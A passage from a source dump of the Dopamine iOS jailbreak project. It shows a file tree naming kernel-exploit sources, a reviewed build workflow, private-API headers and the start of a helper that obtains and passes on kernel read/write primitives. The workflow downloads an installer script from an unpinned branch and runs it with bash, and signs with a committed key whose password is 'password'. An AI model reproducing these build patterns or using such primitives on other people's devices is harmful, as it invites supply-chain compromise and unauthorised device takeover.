├── .github └── workflows │ ├── Dopamine.yml │ ├── Dopamine_prerelease.yml │ └── main.yml ├── .gitignore ├── BaseBin ├── .gitignore ├── _external │ ├── fallback │ │ └── CydiaSubstrate.framework │ │ │ ├── .this_is_ellekit_not_substrate │ │ │ └── CydiaSubstrate │ ├── opainject │ └── tar ├── _shared │ ├── CoreServices │ │ ├── LSApplicationProxy.h │ │ └── LSBundleProxy.h │ ├── CoreSymbolication.h │ ├── FSEvents.h │ ├── bsm │ │ ├── audit.h │ │ ├── audit_filter.h │ │ ├── audit_session.h │ │ ├── audit_uevents.h │ │ └── libbsm.h │ ├── kern_memorystatus.h │ ├── launch.h │ ├── libarchive │ │ ├── archive.h │ │ └── archive_entry.h │ ├── libellekit.tbd │ ├── libproc.h │ ├── libproc_private.h │ ├── sandbox.h │ ├── substrate.h │ └── xpc │ │ ├── XPC.apinotes │ │ ├── activity.h │ │ ├── availability.h │ │ ├── base.h │ │ ├── connection.h │ │ ├── debug.h │ │ ├── endpoint.h │ │ ├── module.modulemap │ │ ├── private.h │ │ ├── rich_error.h │ │ ├── session.h │ │ └── xpc.h ├── boomerang │ ├── Makefile │ ├── entitlements.plist │ └── src │ │ └── main.m ├── clean.sh ├── forkfix │ ├── Makefile │ ├── src │ │ ├── litehook.c │ │ ├── litehook.h │ │ ├── main.c │ │ ├── syscall.S │ │ └── syscall.h │ └── upload.sh ├── idownloadd │ ├── Makefile │ ├── daemon.plist │ ├── entitlements.plist │ └── src │ │ ├── idownloadd.xcodeproj │ │ ├── project.pbxproj │ │ └── project.xcworkspace │ │ │ ├── contents.xcworkspacedata │ │ │ └── xcshareddata │ │ │ ├── IDEWorkspaceChecks.plist │ │ │ └── swiftpm │ │ │ └── Package.resolved │ │ └── idownloadd │ │ ├── iDownloadCmds.swift │ │ ├── iDownloadKRW.swift │ │ ├── idownloadd-Bridging-Header.h │ │ └── main.swift ├── jailbreakd │ ├── Makefile │ ├── README.md │ ├── daemon.plist │ ├── entitlements.plist │ └── src │ │ ├── JBDTCPage.h │ │ ├── JBDTCPage.m │ │ ├── codesign.h │ │ ├── codesign.m │ │ ├── dyld_patch.h │ │ ├── dyld_patch.m │ │ ├── fakelib.h │ │ ├── fakelib.m │ │ ├── forkfix.h │ │ ├── forkfix.m │ │ ├── server.h │ │ ├── server.m │ │ ├── spawn_wrapper.h │ │ ├── 
spawn_wrapper.m │ │ ├── trustcache.h │ │ ├── trustcache.m │ │ ├── trustcache_structs.h │ │ ├── update.h │ │ └── update.m ├── jbctl │ ├── Makefile │ ├── entitlements.plist │ ├── rebuild_daemon.plist │ └── src │ │ └── main.m ├── jbinit │ ├── Makefile │ ├── entitlements.plist │ └── src │ │ ├── launchctl.h │ │ ├── launchctl.m │ │ └── main.m ├── launchdhook │ ├── Makefile │ └── src │ │ ├── boomerang.h │ │ ├── boomerang.m │ │ ├── crashreporter.h │ │ ├── crashreporter.m │ │ ├── daemon_hook.h │ │ ├── daemon_hook.m │ │ ├── dsc_hook.h │ │ ├── dsc_hook.m │ │ ├── ipc_hook.h │ │ ├── ipc_hook.m │ │ ├── main.m │ │ ├── spawn_hook.h │ │ ├── spawn_hook.m │ │ ├── xpc_hook.h │ │ └── xpc_hook.m ├── libfilecom │ ├── Makefile │ └── src │ │ ├── FCHandler.h │ │ └── FCHandler.m ├── libintl.8.dylib ├── libjailbreak │ ├── Makefile │ └── src │ │ ├── boot_info.h │ │ ├── boot_info.m │ │ ├── csblob.h │ │ ├── handoff.h │ │ ├── handoff.m │ │ ├── jailbreakd.h │ │ ├── jailbreakd.m │ │ ├── kcall.h │ │ ├── kcall.m │ │ ├── launchd.h │ │ ├── launchd.m │ │ ├── libjailbreak.h │ │ ├── log.c │ │ ├── log.h │ │ ├── macho.h │ │ ├── macho.m │ │ ├── pac.S │ │ ├── patchfind.h │ │ ├── patchfind.m │ │ ├── pplrw.h │ │ ├── pplrw.m │ │ ├── pte.h │ │ ├── signatures.h │ │ ├── signatures.m │ │ ├── util.h │ │ └── util.m ├── pack.sh ├── rootlesshooks │ ├── .gitignore │ ├── Makefile │ ├── cfprefsd.x │ ├── installd.x │ └── main.x ├── systemhook │ ├── Makefile │ ├── src │ │ ├── common.c │ │ ├── common.h │ │ ├── envbuf.c │ │ ├── envbuf.h │ │ ├── launchd.h │ │ └── main.c │ └── upload.sh ├── tar └── watchdoghook │ ├── Makefile │ └── src │ └── main.m ├── Dopamine ├── .gitignore ├── Dopamine.xcodeproj │ ├── project.pbxproj │ ├── project.xcworkspace │ │ ├── contents.xcworkspacedata │ │ └── xcshareddata │ │ │ ├── IDEWorkspaceChecks.plist │ │ │ └── swiftpm │ │ │ └── Package.resolved │ └── xcshareddata │ │ └── xcschemes │ │ └── Dopamine.xcscheme ├── Dopamine │ ├── Assets.xcassets │ │ ├── AccentColor.colorset │ │ │ └── Contents.json │ │ 
├── AppIcon.appiconset │ │ │ ├── 100.png │ │ │ ├── 1024.png │ │ │ ├── 114.png │ │ │ ├── 120.png │ │ │ ├── 144.png │ │ │ ├── 152.png │ │ │ ├── 167.png │ │ │ ├── 180.png │ │ │ ├── 20.png │ │ │ ├── 29.png │ │ │ ├── 40.png │ │ │ ├── 50.png │ │ │ ├── 57.png │ │ │ ├── 58.png │ │ │ ├── 60.png │ │ │ ├── 72.png │ │ │ ├── 76.png │ │ │ ├── 80.png │ │ │ ├── 87.png │ │ │ └── Contents.json │ │ ├── Backgrounds │ │ │ ├── Clouds.imageset │ │ │ │ ├── Clouds@3x.jpg │ │ │ │ └── Contents.json │ │ │ ├── Contents.json │ │ │ └── Wallpaper.imageset │ │ │ │ ├── Contents.json │ │ │ │ └── pexels-soubhagya-maharana-4124435.jpg │ │ ├── Contents.json │ │ ├── Easter Eggs │ │ │ ├── Contents.json │ │ │ └── fr.imageset │ │ │ │ ├── Contents.json │ │ │ │ └── fr.png │ │ ├── Logos │ │ │ ├── Contents.json │ │ │ ├── DopamineLogo.imageset │ │ │ │ ├── Contents.json │ │ │ │ ├── DopamineLogo@1x.png │ │ │ │ ├── DopamineLogo@2x.png │ │ │ │ └── DopamineLogo@3x.png │ │ │ ├── DopamineLogo2.imageset │ │ │ │ ├── Contents.json │ │ │ │ ├── DopamineLogo@1x.png │ │ │ │ ├── DopamineLogo@2x.png │ │ │ │ └── DopamineLogo@3x.png │ │ │ ├── FuguTransparent.imageset │ │ │ │ ├── Artboard copy 2.png │ │ │ │ ├── Artboard copy.png │ │ │ │ ├── Artboard.png │ │ │ │ └── Contents.json │ │ │ ├── PinautenLogo.imageset │ │ │ │ ├── Contents.json │ │ │ │ ├── Pinauten_Logo_SecResearch_4096 copy 2.png │ │ │ │ ├── Pinauten_Logo_SecResearch_4096 copy.png │ │ │ │ └── Pinauten_Logo_SecResearch_4096.png │ │ │ ├── discord.imageset │ │ │ │ ├── Contents.json │ │ │ │ └── discord-mark-white.png │ │ │ └── github.imageset │ │ │ │ ├── Contents.json │ │ │ │ └── GitHub-Mark-64px.png │ │ ├── Package Managers │ │ │ ├── Contents.json │ │ │ ├── Sileo.imageset │ │ │ │ ├── Contents.json │ │ │ │ └── Sileo.png │ │ │ └── Zebra.imageset │ │ │ │ ├── Contents.json │ │ │ │ └── Zebra.png │ │ ├── Pinauten_Logo_SecResearch_1024.png │ │ ├── Pinauten_Logo_SecResearch_2048.png │ │ └── Pinauten_Logo_SecResearch_4096.png │ ├── Dopamine-Bridging-Header.h │ ├── 
Dopamine.entitlements │ ├── DopamineApp.swift │ ├── Info.plist │ ├── JailbreakView.swift │ ├── Preview Content │ │ └── Preview Assets.xcassets │ │ │ └── Contents.json │ ├── UI │ │ ├── Classes │ │ │ └── Logger.swift │ │ ├── Extensions │ │ │ ├── Error++.swift │ │ │ ├── TextField++.swift │ │ │ └── URLExtension+download.swift │ │ └── Views │ │ │ ├── AboutView.swift │ │ │ ├── Jailbreak.swift │ │ │ ├── JailbreakView.swift │ │ │ ├── LogView.swift │ │ │ ├── MaterialView.swift │ │ │ ├── PackageManagerSelectionView.swift │ │ │ ├── PopupView.swift │ │ │ ├── SettingsView.swift │ │ │ └── UpdateDownloadingView.swift │ ├── bootstrap │ │ ├── bootstrap-iphoneos-arm64.tar.zst │ │ ├── ellekit_1.0_iphoneos-arm64.deb │ │ ├── libjbdrw.deb │ │ ├── preferenceloader_2.2.6-1_iphoneos-arm64.deb │ │ ├── sileo.deb │ │ ├── xinamine_1.0.6_iphoneos-arm64.deb │ │ └── zebra.deb │ ├── constants.h │ ├── constants.m │ ├── include │ │ ├── LSApplicationProxy.h │ │ ├── LSApplicationWorkspace.h │ │ ├── LSBundleProxy.h │ │ ├── _LSApplicationState.h │ │ └── posix_spawn.h │ └── main.swift ├── Makefile ├── ar.lproj │ └── Localizable.strings ├── da.lproj │ └── Localizable.strings ├── de.lproj │ └── Localizable.strings ├── el.lproj │ └── Localizable.strings ├── en.lproj │ └── Localizable.strings ├── fil.lproj │ └── Localizable.strings ├── fr.lproj │ └── Localizable.strings ├── it.lproj │ └── Localizable.strings ├── ja.lproj │ └── Localizable.strings ├── kk.lproj │ └── Localizable.strings ├── ko.lproj │ └── Localizable.strings ├── localization_keys.sh ├── nl.lproj │ └── Localizable.strings ├── pl.lproj │ └── Localizable.strings ├── pt-BR.lproj │ └── Localizable.strings ├── ru.lproj │ └── Localizable.strings ├── sort_localizations.sh ├── sv.lproj │ └── Localizable.strings ├── tr.lproj │ └── Localizable.strings ├── uk.lproj │ └── Localizable.strings ├── ur.lproj │ └── Localizable.strings ├── vi.lproj │ └── Localizable.strings ├── zh-Hans.lproj │ └── Localizable.strings ├── zh_CN.lproj │ └── Localizable.strings ├── 
zh_HK.lproj │ └── Localizable.strings └── zh_TW.lproj │ └── Localizable.strings ├── Exploits ├── fastPath │ ├── arm.pfx │ ├── ca.conf │ ├── clean.sh │ ├── genCrt.sh │ ├── itd.conf │ ├── usr_arm.conf │ ├── usr_x86_64.conf │ └── x86_64.pfx └── oobPCI │ ├── .gitignore │ ├── Makefile │ ├── Sources │ ├── DriverKit.c │ ├── DriverKit.h │ ├── DriverKitClasses.h │ ├── Fugu15KRW.h │ ├── asm.S │ ├── badRecovery.c │ ├── badRecovery.h │ ├── device.defs │ ├── generated │ │ ├── device.c │ │ ├── device.h │ │ ├── mach_host.c │ │ ├── mach_host.h │ │ ├── task.c │ │ ├── task.h │ │ ├── thread.c │ │ └── thread.h │ ├── includeme.h │ ├── kernel.c │ ├── kernel.h │ ├── kernrw_alloc.c │ ├── kernrw_alloc.h │ ├── mach.c │ ├── mach_host.defs │ ├── main.c │ ├── misc.c │ ├── offsets.c │ ├── offsets.h │ ├── oobPCI.c │ ├── oobPCI.h │ ├── physrw.c │ ├── physrw.h │ ├── print.c │ ├── sleep.c │ ├── sleep.h │ ├── task.defs │ ├── thread.defs │ ├── tlbFail.c │ ├── tlbFail.h │ ├── virtrw.c │ ├── virtrw.h │ └── xprr.h │ └── oobPCI.entitlements ├── LICENSE.md ├── LICENSE_Fugu15.md ├── LICENSE_libc.md ├── Makefile ├── Packages ├── Fugu15KernelExploit │ ├── .gitignore │ ├── Package.swift │ ├── README.md │ └── Sources │ │ ├── CBindings │ │ ├── fcntl.m │ │ ├── include │ │ │ ├── CBindings.h │ │ │ ├── libjailbreak.h │ │ │ ├── posix_spawn.h │ │ │ ├── th_state.h │ │ │ ├── wifi.h │ │ │ ├── zdict.h │ │ │ ├── zstd.h │ │ │ └── zstd_errors.h │ │ ├── launch.h │ │ ├── libjailbreak.m │ │ ├── pci_offset.m │ │ ├── th_state.c │ │ ├── wifi.m │ │ ├── xpc │ │ │ ├── XPC.apinotes │ │ │ ├── activity.h │ │ │ ├── availability.h │ │ │ ├── base.h │ │ │ ├── connection.h │ │ │ ├── debug.h │ │ │ ├── endpoint.h │ │ │ ├── module.modulemap │ │ │ └── xpc.h │ │ └── zstd_wrapper.m │ │ └── Fugu15KernelExploit │ │ ├── Bootstrapper.swift │ │ ├── Fugu15.swift │ │ ├── KRWHandler.swift │ │ ├── Logger.swift │ │ ├── SpawnDrv │ │ ├── SpawnDrv.swift │ │ └── tp.swift │ │ ├── Util.swift │ │ ├── codelessKext.swift │ │ └── oobPCI.swift └── 
ProcessCommunication │ ├── .gitignore │ ├── Package.swift │ ├── README.md │ └── Sources │ └── ProcessCommunication │ └── ProcessCommunication.swift ├── README.md ├── Tools ├── Exe2Driver │ ├── .gitignore │ ├── Exe2Driver │ ├── Makefile │ ├── Package.resolved │ ├── Package.swift │ ├── README.md │ └── Sources │ │ └── Exe2Driver │ │ └── main.swift ├── Makefile ├── Makefile.inc ├── fastPathSign │ ├── .gitignore │ ├── Makefile │ ├── Package.swift │ ├── README.md │ ├── Sources │ │ ├── Security_Codesign │ │ │ ├── SecCodeSigner.h │ │ │ └── module.modulemap │ │ └── fastPathSign │ │ │ └── main.swift │ └── fastPathSign └── installHaxx │ ├── .gitignore │ ├── Makefile │ ├── Package.resolved │ ├── Package.swift │ ├── README.md │ ├── Sources │ └── installHaxx │ │ └── main.swift │ └── installHaxx ├── jbupdate.sh ├── release.md └── release_history.md
/.github/workflows/main.yml:
--------------------------------------------------------------------------------
# Workflow: builds Dopamine on a macOS runner and uploads the resulting .tipa
# twice, once as "Dopamine_Latest" and once named after the short commit hash
# and build time. It runs on pushes and pull requests to main, on manual
# dispatch, and on five fixed cron dates per year.
#
# NOTE(review): no `permissions:` key is declared, so GITHUB_TOKEN gets the
# repository/organisation default. The steps below only read the checkout and
# upload artifacts; consider declaring `permissions: contents: read`.
name: "Dopamine: build and upload"

on:
  push:
    branches:
      - main
    paths-ignore:
      - ".gitignore"
  # Pull-request code is built by the same job. No `secrets.*` value is
  # referenced by any step in this file.
  pull_request:
    branches:
      - main
    paths-ignore:
      - ".gitignore"
  workflow_dispatch:
  schedule:
    - cron: '0 0 1 1 *'
    - cron: '0 0 1 4 *'
    - cron: '0 0 30 6 *'
    - cron: '0 0 28 9 *'
    - cron: '0 0 27 12 *'

# One run per workflow+ref; a newer run cancels the one in progress.
concurrency:
  group: ${{ github.workflow }}-${{ github.ref }}
  cancel-in-progress: true

jobs:
  build:
    runs-on: macos-13
    steps:
      - name: Checkout
        uses: actions/checkout@v3

      # NOTE(review): this third-party action is referenced by the mutable
      # branch `main`, so the code that runs here can change without any
      # change to this repository. Pin it to a full commit SHA.
      - name: Install Procursus
        uses: dhinakg/procursus-action@main
        with:
          packages: ldid findutils sed coreutils make

      # Downloads the THEOS installer from the `master` branch at build time,
      # patches it with gsed and runs it with bash. The gsed expression inserts
      # `mkdir -p ${THEOS}/sdks` and `touch ${THEOS}/sdks/sdk` before the
      # `get_sdks` call that follows `get_theos` (presumably so the installer
      # skips the SDK download, as the step name suggests).
      # NOTE(review): nothing pins or verifies the downloaded script (no commit
      # SHA, no checksum); the job executes whatever that branch serves at run
      # time. `>>` appends to install-theos.sh instead of replacing it.
      - name: Install THEOS (without SDKs)
        run: |
          set -x
          export BASEDIR="$(pwd)"
          export THEOS="${BASEDIR}/theos"
          mkdir -p $THEOS
          curl -fsSL https://raw.githubusercontent.com/theos/theos/master/bin/install-theos >> install-theos.sh
          gsed -E "/^\s*get_theos\s*$/,+1 s/^(\s*)(get_sdks)\s*$/\1mkdir -p \${THEOS}\/sdks\n\1touch \${THEOS}\/sdks\/sdk\n\1\2/g" -i install-theos.sh
          bash install-theos.sh
          cd $BASEDIR

      # Clones the default branch of an external repository, builds it and
      # copies the binary into /opt/procursus/bin with sudo.
      # NOTE(review): the clone is not pinned to a tag or commit, so the tool
      # that later takes part in the build is whatever HEAD is at run time.
      - name: Build and Install trustcache
        run: |
          set -x
          git clone https://github.com/CRKatri/trustcache
          cd trustcache
          gmake -j$(sysctl -n hw.physicalcpu) OPENSSL=1
          sudo cp trustcache /opt/procursus/bin/

      # Exports three values to later steps through $GITHUB_ENV: a timestamp
      # formatted under TZ=UTC-2, the same instant as epoch seconds, and the
      # short commit hash. All three come from `date` and `git rev-parse`.
      - name: Set Environment Variables
        run: |
          set -x
          T2=$(TZ=UTC-2 date +'%Y%m%d_%H%M%S')
          TS=$(date -j -f "%Y%m%d_%H%M%S" "${T2}" +%s)
          SHASH=$(git rev-parse --short HEAD)
          echo "ctime=${T2}" >> $GITHUB_ENV
          echo "ctimestamp=${TS}" >> $GITHUB_ENV
          echo "shorthash=${SHASH}" >> $GITHUB_ENV

      # Imports the PKCS#12 file tracked in this repository into the runner's
      # System keychain, then builds with gmake and makes two named copies of
      # the .tipa.
      # NOTE(review): the passphrase is the literal `password` on this line and
      # the .pfx is committed, so this key is not a secret and a signature made
      # with it says nothing about who built the artifact. `-A` lets any
      # application use the imported key without a prompt; that is tolerable
      # only because the runner is assumed to be ephemeral (TODO confirm this
      # job never runs on a persistent self-hosted runner).
      - name: Build
        run: |
          set -x
          sudo security import Exploits/fastPath/arm.pfx -k /Library/Keychains/System.keychain -P password -A
          export BASEDIR="$(pwd)"
          export THEOS="${BASEDIR}/theos"
          gmake -j$(sysctl -n hw.physicalcpu)
          cp -a Dopamine/Dopamine.tipa Dopamine/Dopamine_${{ env.shorthash }}_${{ env.ctime }}.tipa
          cp -a Dopamine/Dopamine.tipa Dopamine/Dopamine_Latest.tipa

      - name: Upload Latest Artifact
        id: dopamine-latest-upload
        uses: actions/upload-artifact@v3
        with:
          name: Dopamine_Latest
          path: |
            ${{ github.workspace }}/Dopamine/Dopamine_Latest.tipa
      - name: Upload Hashed Artifact
        id: dopamine-hashed-upload
        uses: actions/upload-artifact@v3
        with:
          name: Dopamine_${{ env.shorthash }}_${{ env.ctime }}
          path: |
            ${{ github.workspace }}/Dopamine/Dopamine_${{ env.shorthash }}_${{ env.ctime }}.tipa
-------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | .DS_Store 2 | /.build 3 | /*.xcodeproj 4 | xcuserdata/ 5 | DerivedData/ 6 | .swiftpm/xcode/ 7 | /Package.resolved 8 | /Server/orig.ipa 9 | /Server/serverCert/fullchain.cer 10 | 
/Server/serverCert/server.key 11 | Dopamine/Dopamine/bootstrap/tmp/ 12 | .idea 13 | Tools/fastPathSign/.build_* 14 | *.log 15 | .vscode 16 | Fugu15/ 17 | -------------------------------------------------------------------------------- /BaseBin/.gitignore: -------------------------------------------------------------------------------- 1 | basebin.tc 2 | libjailbreak/libjailbreak.dylib 3 | jailbreakd/jailbreakd 4 | jbinit/jbinit 5 | jbctl/jbctl 6 | launchdhook/launchdhook.dylib 7 | forkfix/forkfix.dylib 8 | systemhook/systemhook.dylib 9 | watchdoghook/watchdoghook.dylib 10 | libfilecom/libfilecom.dylib 11 | boomerang/boomerang 12 | idownloadd/idownloadd 13 | idownloadd/.build.xcarchive 14 | _shared/libjailbreak 15 | _shared/libfilecom 16 | .tmp -------------------------------------------------------------------------------- /BaseBin/_external/fallback/CydiaSubstrate.framework/.this_is_ellekit_not_substrate: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/BaseBin/_external/fallback/CydiaSubstrate.framework/.this_is_ellekit_not_substrate -------------------------------------------------------------------------------- /BaseBin/_external/fallback/CydiaSubstrate.framework/CydiaSubstrate: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/BaseBin/_external/fallback/CydiaSubstrate.framework/CydiaSubstrate -------------------------------------------------------------------------------- /BaseBin/_external/opainject: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/BaseBin/_external/opainject -------------------------------------------------------------------------------- /BaseBin/_external/tar: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/BaseBin/_external/tar -------------------------------------------------------------------------------- /BaseBin/_shared/CoreServices/LSApplicationProxy.h: -------------------------------------------------------------------------------- 1 | #import "LSBundleProxy.h" 2 | @interface LSApplicationProxy : LSBundleProxy 3 | + (instancetype)applicationProxyForIdentifier:(NSString *)identifier; 4 | @end -------------------------------------------------------------------------------- /BaseBin/_shared/CoreServices/LSBundleProxy.h: -------------------------------------------------------------------------------- 1 | @interface LSBundleProxy : NSObject 2 | @property (nonatomic) NSURL *bundleURL; 3 | @property (nonatomic,readonly) NSString *bundleExecutable; 4 | @end -------------------------------------------------------------------------------- /BaseBin/_shared/libproc_private.h: -------------------------------------------------------------------------------- 1 | struct proc_bsdinfo { 2 | uint32_t pbi_flags; /* 64bit; emulated etc */ 3 | uint32_t pbi_status; 4 | uint32_t pbi_xstatus; 5 | uint32_t pbi_pid; 6 | uint32_t pbi_ppid; 7 | uid_t pbi_uid; 8 | gid_t pbi_gid; 9 | uid_t pbi_ruid; 10 | gid_t pbi_rgid; 11 | uid_t pbi_svuid; 12 | gid_t pbi_svgid; 13 | uint32_t rfu_1; /* reserved */ 14 | char pbi_comm[MAXCOMLEN]; 15 | char pbi_name[2 * MAXCOMLEN]; /* empty if no name is registered */ 16 | uint32_t pbi_nfiles; 17 | uint32_t pbi_pgid; 18 | uint32_t pbi_pjobc; 19 | uint32_t e_tdev; /* controlling tty dev */ 20 | uint32_t e_tpgid; /* tty process group id */ 21 | int32_t pbi_nice; 22 | uint64_t pbi_start_tvsec; 23 | uint64_t pbi_start_tvusec; 24 | }; 25 | 26 | #define PROC_PIDTBSDINFO 3 27 | #define PROC_PIDTBSDINFO_SIZE (sizeof(struct proc_bsdinfo)) 
-------------------------------------------------------------------------------- /BaseBin/_shared/xpc/XPC.apinotes: -------------------------------------------------------------------------------- 1 | Name: XPC 2 | Functions: 3 | # xpc_object 4 | - Name: xpc_retain 5 | Availability: nonswift 6 | - Name: xpc_release 7 | Availability: nonswift 8 | -------------------------------------------------------------------------------- /BaseBin/_shared/xpc/debug.h: -------------------------------------------------------------------------------- 1 | #ifndef __XPC_DEBUG_H__ 2 | #define __XPC_DEBUG_H__ 3 | 4 | /*! 5 | * @function xpc_debugger_api_misuse_info 6 | * Returns a pointer to a string describing the reason XPC aborted the calling 7 | * process. On OS X, this will be the same string present in the "Application 8 | * Specific Information" section of the crash report. 9 | * 10 | * @result 11 | * A pointer to the human-readable string describing the reason the caller was 12 | * aborted. If XPC was not responsible for the program's termination, NULL will 13 | * be returned. 14 | * 15 | * @discussion 16 | * This function is only callable from within a debugger. It is not meant to be 17 | * called by the program directly. 18 | */ 19 | XPC_DEBUGGER_EXCL 20 | const char * 21 | xpc_debugger_api_misuse_info(void); 22 | 23 | #endif // __XPC_DEBUG_H__ 24 | -------------------------------------------------------------------------------- /BaseBin/_shared/xpc/endpoint.h: -------------------------------------------------------------------------------- 1 | #ifndef __XPC_ENDPOINT_H__ 2 | #define __XPC_ENDPOINT_H__ 3 | 4 | /*! 5 | * @function xpc_endpoint_create 6 | * Creates a new endpoint from a connection that is suitable for embedding into 7 | * messages. 8 | * 9 | * @param connection 10 | * Only connections obtained through calls to xpc_connection_create*() may be 11 | * given to this API. 
Passing any other type of connection is not supported and 12 | * will result in undefined behavior. 13 | * 14 | * @result 15 | * A new endpoint object. 16 | */ 17 | __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) 18 | XPC_EXPORT XPC_MALLOC XPC_RETURNS_RETAINED XPC_WARN_RESULT XPC_NONNULL1 19 | xpc_endpoint_t _Nonnull 20 | xpc_endpoint_create(xpc_connection_t _Nonnull connection); 21 | 22 | #endif // __XPC_ENDPOINT_H__ 23 | -------------------------------------------------------------------------------- /BaseBin/_shared/xpc/module.modulemap: -------------------------------------------------------------------------------- 1 | module XPC [system] [extern_c] { 2 | header "xpc.h" 3 | header "availability.h" 4 | header "base.h" 5 | header "activity.h" 6 | header "connection.h" 7 | header "debug.h" 8 | header "endpoint.h" 9 | export * 10 | } 11 | -------------------------------------------------------------------------------- /BaseBin/_shared/xpc/private.h: -------------------------------------------------------------------------------- 1 | void xpc_dictionary_get_audit_token(xpc_object_t xdict, audit_token_t *token); 2 | char *xpc_strerror (int); 3 | 4 | extern XPC_RETURNS_RETAINED xpc_object_t xpc_pipe_create_from_port(mach_port_t port, uint32_t flags); 5 | extern int xpc_pipe_simpleroutine(xpc_object_t pipe, xpc_object_t message); 6 | extern int xpc_pipe_routine(xpc_object_t pipe, xpc_object_t message, XPC_GIVES_REFERENCE xpc_object_t *reply); 7 | extern int xpc_pipe_routine_with_flags(xpc_object_t xpc_pipe, xpc_object_t inDict, XPC_GIVES_REFERENCE xpc_object_t *reply, uint32_t flags); 8 | extern int xpc_pipe_routine_reply(xpc_object_t reply); 9 | extern int xpc_pipe_receive(mach_port_t port, XPC_GIVES_REFERENCE xpc_object_t *message); 10 | 11 | extern XPC_RETURNS_RETAINED xpc_object_t xpc_copy_entitlement_for_token(const char *, audit_token_t *); -------------------------------------------------------------------------------- /BaseBin/_shared/xpc/rich_error.h: 
-------------------------------------------------------------------------------- 1 | #ifndef __XPC_RICH_ERROR_H__ 2 | #define __XPC_RICH_ERROR_H__ 3 | 4 | #ifndef __XPC_INDIRECT__ 5 | #error "Please #include instead of this file directly." 6 | // For HeaderDoc. 7 | #include 8 | #endif // __XPC_INDIRECT__ 9 | 10 | #ifndef __BLOCKS__ 11 | #error "XPC Rich Errors require Blocks support." 12 | #endif // __BLOCKS__ 13 | 14 | XPC_ASSUME_NONNULL_BEGIN 15 | __BEGIN_DECLS 16 | 17 | #pragma mark Properties 18 | /*! 19 | * @function xpc_rich_error_copy_description 20 | * Copy the string description of an error. 21 | * 22 | * @param error 23 | * The error to be examined. 24 | * 25 | * @result 26 | * The underlying C string for the provided error. This string should be 27 | * disposed of with free(3) when done. 28 | * 29 | * This will return NULL if a string description could not be generated. 30 | */ 31 | XPC_EXPORT XPC_WARN_RESULT 32 | char * _Nullable 33 | xpc_rich_error_copy_description(xpc_rich_error_t error); 34 | 35 | /*! 36 | * @function xpc_rich_error_can_retry 37 | * Whether the operation the error originated from can be retried. 38 | * 39 | * @param error 40 | * The error to be inspected. 41 | * 42 | * @result 43 | * Whether the operation the error originated from can be retried. 
44 | */ 45 | XPC_EXPORT XPC_WARN_RESULT 46 | bool 47 | xpc_rich_error_can_retry(xpc_rich_error_t error); 48 | 49 | __END_DECLS 50 | XPC_ASSUME_NONNULL_END 51 | 52 | #endif // __XPC_RICH_ERROR_H__ 53 | -------------------------------------------------------------------------------- /BaseBin/boomerang/Makefile: -------------------------------------------------------------------------------- 1 | TARGET = boomerang 2 | 3 | CC = clang 4 | 5 | CFLAGS = -framework Foundation -framework CoreServices -framework Security -I../_shared -I./src -isysroot $(shell xcrun --sdk iphoneos --show-sdk-path) -arch arm64e -miphoneos-version-min=15.0 -fobjc-arc -Wno-nullability-completeness-on-arrays -O2 6 | LDFLAGS = -L../libjailbreak -ljailbreak -L../libfilecom -lfilecom 7 | 8 | sign: $(TARGET) 9 | @ldid -Sentitlements.plist $< 10 | 11 | $(TARGET): $(wildcard src/*.m) 12 | $(CC) $(CFLAGS) $(LDFLAGS) -o $@ $^ 13 | install_name_tool -change "/var/jb/basebin/libjailbreak.dylib" "@loader_path/libjailbreak.dylib" $@ 14 | install_name_tool -change "/var/jb/basebin/libfilecom.dylib" "@loader_path/libfilecom.dylib" $@ 15 | 16 | clean: 17 | @rm -f $(TARGET) -------------------------------------------------------------------------------- /BaseBin/boomerang/entitlements.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | platform-application 6 | 7 | com.apple.private.security.no-container 8 | 9 | 10 | 11 |
--------------------------------------------------------------------------------
/BaseBin/boomerang/src/main.m:
--------------------------------------------------------------------------------
// boomerang: a helper process that first obtains the PPL read/write primitives
// over a file-based message channel (getPrimitives) and then serves them back
// to its peer over the same channel (sendPrimitives).
//
// The header names on the six #import lines below are missing in this listing.
#import
#import
#import
#import
#import
#import

// Message channel shared by both phases; created in main().
FCHandler *gHandler;

// Asks launchd over XPC for the PPL read/write primitives
// (LAUNCHD_JB_MSG_ID_GET_PPLRW) and initialises them locally on success.
// Returns 0 on success, otherwise the "error" value from the reply.
// Not called from anywhere in this file.
// NOTE(review): `reply` is used without a NULL check; whether
// launchd_xpc_send_message can return NULL is not visible here.
int launchdInitPPLRW(void)
{
    xpc_object_t msg = xpc_dictionary_create_empty();
    xpc_dictionary_set_bool(msg, "jailbreak", true);
    xpc_dictionary_set_uint64(msg, "id", LAUNCHD_JB_MSG_ID_GET_PPLRW);
    xpc_object_t reply = launchd_xpc_send_message(msg);

    int error = xpc_dictionary_get_int64(reply, "error");
    if (error == 0) {
        initPPLPrimitives();
        return 0;
    }
    else {
        return error;
    }
}

// Phase 1: request the primitives from the peer and block until they arrive.
// Sends {"id": "getPPLRW", "pid": <own pid>}, waits without timeout for a
// "receivePPLRW" message, then recovers the PAC primitives and reports
// "primitivesInitialized".
// NOTE(review): the handler calls initPPLPrimitives() on any "receivePPLRW"
// message without looking at an error field. The reply built in
// sendPrimitives() below carries "errorCode"; if the peer's reply does too,
// a failed handoff is treated as success here.
void getPrimitives(void)
{
    dispatch_semaphore_t sema = dispatch_semaphore_create(0);
    // Receive PPLRW
    gHandler.receiveHandler = ^(NSDictionary *message)
    {
        NSString *identifier = message[@"id"];
        if (identifier) {
            if ([identifier isEqualToString:@"receivePPLRW"])
            {
                initPPLPrimitives();
                dispatch_semaphore_signal(sema);
            }
        }
    };
    [gHandler sendMessage:@{ @"id" : @"getPPLRW", @"pid" : @(getpid()) }];

    dispatch_semaphore_wait(sema, DISPATCH_TIME_FOREVER);

    recoverPACPrimitives();

    // Tell launchd we're done, this will trigger the userspace reboot (that this process should survive)
